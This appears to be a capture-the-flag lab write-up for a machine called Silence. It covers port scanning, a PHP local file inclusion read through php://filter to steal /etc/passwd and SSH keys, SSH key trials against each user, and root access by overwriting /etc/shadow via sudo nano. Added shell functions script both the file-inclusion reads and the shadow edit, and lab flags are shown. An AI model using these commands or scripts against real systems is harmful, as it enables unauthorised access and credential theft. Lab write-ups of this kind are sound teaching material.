Month: February 2021
ptd-silence-private
┌─[user@parrot-virtual]─[~/ptd/10.150.150.55]
└──╼ $cat allports.nmap
# Nmap 7.91 scan initiated Wed Feb 17 08:03:40 2021 as: nmap -A -oN allports.nmap 10.150.150.55
Nmap scan report for 10.150.150.55
Host is up (0.032s latency).
Not shown: 995 closed ports
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--    1 0        0              13 Jun 12  2020 test
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to ::ffff:10.66.66.42
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
80/tcp   open  http        Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
139/tcp  open  netbios-ssn Samba smbd 4.6.2
445/tcp  open  netbios-ssn Samba smbd 4.6.2
1055/tcp open  ssh         OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: 53m37s
|_nbstat: NetBIOS name: UBUNTU, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2021-02-17T08:57:32
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Feb 17 08:03:55 2021 -- 1 IP address (1 host up) scanned in 14.70 seconds
┌─[✗]─[user@parrot-virtual]─[~/ptd/10.150.150.55]
└──╼ $dirb http://10.150.150.55 /usr/share/wordlists/10k-most-common.txt -X .php

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Thu Feb 18 08:27:26 2021
URL_BASE: http://10.150.150.55/
WORDLIST_FILES: /usr/share/wordlists/10k-most-common.txt
EXTENSIONS_LIST: (.php) | (.php) [NUM = 1]

-----------------

GENERATED WORDS: 10000

---- Scanning URL: http://10.150.150.55/ ----
+ http://10.150.150.55/trick.php (CODE:200|SIZE:0)
+ http://10.150.150.55/info.php (CODE:200|SIZE:70050)
+ http://10.150.150.55/??????.php (CODE:200|SIZE:10918)
+ http://10.150.150.55/?????.php (CODE:200|SIZE:10918)

-----------------
END_TIME: Thu Feb 18 08:32:58 2021
DOWNLOADED: 10000 - FOUND: 4

┌─[user@parrot-virtual]─[~/ptd/10.150.150.55]
└──╼ $cat trick.php
<?php include($_GET['page']); ?>
┌─[user@parrot-virtual]─[~/ptd/10.150.150.55]
└──╼ $curl -X POST --data "file=browser.php" 10.150.150.55/info.php

┌─[user@parrot-virtual]─[~/ptd/10.150.150.55]
└──╼ $smbclient -L 10.150.150.55 -U "" -N

	Sharename       Type      Comment
	---------       ----      -------
	print$          Disk      Printer Drivers
	IPC$            IPC       IPC Service (ubuntu server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available
trick.php?page=index.html
curl 'http://10.150.150.55/trick.php?page=php://filter/convert.base64-encode/resource=index.php' | base64 -d > index.php
And in that source you then find:
index.php?path=/
=> http://10.150.150.55/index.php?path=/
http://10.150.150.55/index.php?path=/home/sally/backup/SSHArchiveBackup.tar.gz
curl 'http://10.150.150.55/trick.php?page=php://filter/convert.base64-encode/resource=/home/sally/backup/SSHArchiveBackup.tar.gz' | base64 -d > home/sally/backup/SSHArchiveBackup.tar.gz

┌─[user@parrot-virtual]─[~/ptd/10.150.150.55]
└──╼ $ls -la
total 256
drwxr-xr-x 1 user user    138 Feb 17 10:55 .
drwxr-xr-x 1 user user   2034 Feb 17 08:02 ..
-rw-r--r-- 1 user user   1617 Feb 17 08:03 allports.nmap
-rw-r--r-- 1 user user  56184 Feb 17 10:45 browser.php
-rw-r--r-- 1 user user      6 Feb 17 08:05 hallo.txt
-rw-r--r-- 1 user user   4694 Feb 17 10:24 index.php
-rw-r--r-- 1 user user 183770 Feb 17 10:55 SSHArchiveBackup.tar.gz
-rw-r--r-- 1 user user     13 Feb 17 08:06 test
┌─[user@parrot-virtual]─[~/ptd/10.150.150.55]
└──╼ $curl 'http://10.150.150.55/trick.php?page=php://filter/convert.base64-encode/resource=/home/sally/backup/SSHArchiveBackup.tar.gz' | base64 -d > SSHArchiveBackup.tar.gz

┌─[user@parrot-virtual]─[~/ptd/10.150.150.55]
└──╼ $curl 'http://10.150.150.55/trick.php?page=php://filter/convert.base64-encode/resource=/etc/passwd' | base64 -d > passwd
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0
100  4128  100  4128    0     0  58971      0 --:--:-- --:--:-- --:--:-- 58971
┌─[user@parrot-virtual]─[~/ptd/10.150.150.55]
└──╼ $cat passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
--snip--
sshd:x:126:65534::/run/sshd:/usr/sbin/nologin
gary:x:1001:1001::/home/gary:/bin/sh
john:x:1002:1002::/home/john:/bin/sh
sally:x:1003:1003::/home/sally:/bin/sh
alice:x:1004:1004::/home/alice:/bin/sh
ftp:x:127:133:ftp daemon,,,:/srv/ftp/home/:/usr/sbin/nologin
ftpuser:x:1005:1005::/home/ftpuser:/bin/sh
Debian-snmp:x:128:136::/var/lib/snmp:/bin/false
┌─[user@parrot-virtual]─[~/ptd/10.150.150.55] └──╼ $curl 'http://10.150.150.55/trick.php?page=php://filter/convert.base64-encode/resource=/home/alice/myFile.txt' | base64 -d > myFile.txt
for key in id_rsa*; do echo $key; ssh -p 1055 -o "PreferredAuthentications=publickey" alice@10.150.150.55 -i $key; done
And then the same for the other users (gary, john and sally):
for key in id_rsa*; do echo $key; ssh -p 1055 -o "PreferredAuthentications=publickey" john@10.150.150.55 -i $key; done
curl 'http://10.150.150.55/trick.php?page=php://filter/convert.base64-encode/resource=/home/john/FLAG79.txt' | base64 -d > FLAG79.txt
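The php://filter reads above, wrapped in shell functions as an added example (this is not the writeup's own code). It builds the same URL trick.php accepts, decodes the body, and refuses an empty response, which is what an include() of a missing or unreadable path typically yields with display_errors off. The host is the one from the writeup; the function names and the BASE variable are my own. Without the base64 filter, include() would execute a .php resource and return only its output, never its source, which is why the writeup pulls index.php through the filter.

```sh
#!/bin/sh
# Added example, not from the writeup. Assumes the target and trick.php from
# the post; override BASE to point it elsewhere.
BASE="${BASE:-http://10.150.150.55}"

# Build the URL that makes include() hand back the file's bytes base64-encoded
# instead of executing them. The resource path is passed through as-is (no
# URL-encoding), which matches how the writeup's curl calls were typed.
lfi_url() {
  printf '%s/trick.php?page=php://filter/convert.base64-encode/resource=%s\n' "$BASE" "$1"
}

# Decode a response body read from stdin. An empty body means include() gave
# nothing back (wrong path, or www-data cannot read it), so fail instead of
# silently writing an empty file.
lfi_decode() {
  body=$(cat)
  [ -n "$body" ] || { echo "empty response: include() returned nothing" >&2; return 1; }
  printf '%s' "$body" | base64 -d
}

# Fetch and decode one file. Usage: lfi_get /etc/passwd > passwd
lfi_get() {
  curl -fsS "$(lfi_url "$1")" | lfi_decode
}
```

lfi_get is the only function that touches the network; the other two can be exercised offline, which is also how to sanity-check the payload before pointing it at a live host.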
echo "ssh-rsa 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 root@parrot-virtual" > authorized_keys
┌─[✗]─[user@parrot-virtual]─[~/ptd/10.150.150.55]
└──╼ $sudo ssh -i id_rsa john@10.150.150.55 -p 1055
Silence Please
Last login: Sat Jul 4 02:27:27 2020 from 10.210.210.55
$ id
uid=1002(john) gid=1002(john) groups=1002(john),1006(netAdmin)
$ cat FLAG79.txt
3ca569f9d5bc771b0457c4f4d42d29c4824e8d70
$ sudo -l
Matching Defaults entries for john on ubuntu:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
logfile=/var/log/sudo.log
User john may run the following commands on ubuntu:
(ALL) NOPASSWD: /usr/bin/nano
$ pwd
/home/john/.ssh
$ openssl passwd -6 -salt xyz yourpass
$6$xyz$VKswtvLoVpOLcpjDMIFXhxa8ukqqKSKHjcPBLZUk9NxWldmlFQY4stUGo.QjEhav7mp86ih2PRqYPqjkhWi5y.
$
$ nano /etc/shadow
$ id
uid=1002(john) gid=1002(john) groups=1002(john),1006(netAdmin)
$ sudo nano /etc/shadow
$ su root
Password:
root@ubuntu:/home/john# cd /root
root@ubuntu:~# ls
FLAG80.txt hiddenFile snap
root@ubuntu:~# cat FLAG80.txt
75a60cd346351234ecb8348d7c1da94dac75fc4c
root@ubuntu:~#
root@ubuntu:~# cat /etc/shadow | grep root
root:$6$xyz$VKswtvLoVpOLcpjDMIFXhxa8ukqqKSKHjcPBLZUk9NxWldmlFQY4stUGo.QjEhav7mp86ih2PRqYPqjkhWi5y.:18501:0:99999:7:::
root@ubuntu:~#
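The /etc/shadow edit above was done by hand in nano. As an added example (not the writeup's own code), here is the same change as shell functions that can be run against a copy of the file first and checked before `su root`. The hash is the one the writeup generated with `openssl passwd -6 -salt xyz yourpass`; the sample shadow file at the bottom is constructed for the demo and is not the target's. Nothing here touches the real /etc/shadow unless you pass that path, and doing so needs root, as it did in the post.

```sh
#!/bin/sh
# Added example, not from the writeup: scripted version of the manual nano
# edit of /etc/shadow. FILE and USER are parameters; function names are mine.

# Print the hash field (field 2) of USER from a shadow-format FILE.
get_shadow_hash() {
  awk -F: -v u="$2" '$1 == u { print $2 }' "$1"
}

# Replace the hash field of USER in FILE with HASH, leaving every other field
# (last change, min/max age, warn, inactive, expire) untouched. Fails if USER
# has no line, so a typo does not pass silently. The rewrite goes through
# `cat > FILE` rather than `mv` so the file keeps its inode, owner and mode
# (root:shadow 0640 on Ubuntu); a moved temp file would lose those.
set_shadow_hash() {
  file=$1; user=$2; hash=$3
  grep -q "^$user:" "$file" || { echo "no entry for $user in $file" >&2; return 1; }
  awk -F: -v OFS=: -v u="$user" -v h="$hash" '$1 == u { $2 = h } { print }' "$file" > "$file.new" &&
    cat "$file.new" > "$file" && rm -f "$file.new"
}

# Demo on a constructed shadow file (not the target's): set root's hash to the
# value the writeup produced with openssl, then show the result.
demo_shadow() {
  d=$(mktemp -d)
  printf 'root:*:18501:0:99999:7:::\njohn:$6$abc$oldhash:18501:0:99999:7:::\n' > "$d/shadow"
  set_shadow_hash "$d/shadow" root '$6$xyz$VKswtvLoVpOLcpjDMIFXhxa8ukqqKSKHjcPBLZUk9NxWldmlFQY4stUGo.QjEhav7mp86ih2PRqYPqjkhWi5y.'
  cat "$d/shadow"
  rm -rf "$d"
}

demo_shadow
```

After the edit, `get_shadow_hash /etc/shadow root` should print exactly the string openssl produced; if it does not, check for a stray newline or a shell that expanded `$6`, `$xyz` inside double quotes.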
Author : Puckiestyle